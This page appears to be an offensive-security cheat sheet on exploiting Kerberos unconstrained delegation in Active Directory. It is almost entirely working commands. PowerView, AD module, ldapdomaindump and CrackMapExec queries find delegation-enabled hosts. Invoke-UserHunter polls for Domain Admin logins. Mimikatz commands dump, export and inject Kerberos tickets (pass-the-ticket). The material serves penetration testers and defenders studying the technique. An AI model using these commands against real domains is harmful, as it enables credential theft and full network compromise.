Unconstrained Delegation
General
Exploitation
# Get computers that have unconstrained delegation enabled
# Using PowerView
Get-NetComputer -Unconstrained
# Using AD Module
Get-ADComputer -Filter { TrustedForDelegation -eq $true }
Get-ADUser -Filter { TrustedForDelegation -eq $true }
# ldapdomaindump
ldapdomaindump -u "DOMAIN\\Account" -p "Password123*" 10.10.10.10
grep TRUSTED_FOR_DELEGATION domain_computers.grep
# CrackMapExec
crackmapexec ldap 10.10.10.10 -u username -p password --trusted-for-delegation
# Monitor DA logins on computer
Invoke-UserHunter -ComputerName dcorp-appsrv -Poll 100 -UserName Administrator -Delay 5 -Verbose
# Check if we have local admin access on that machine using PowerView
Find-LocalAdminAccess -ComputerName dcorp-appsrv
# Get session on machine as local admin and check for tickets
Invoke-Mimikatz -Command '"sekurlsa::tickets"'
# Export tickets
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
# Inject ticket into session
Invoke-Mimikatz -Command '"kerberos:ptt ticket.kirbi"'Printer Bug
Mitigation
Further Reading
Last updated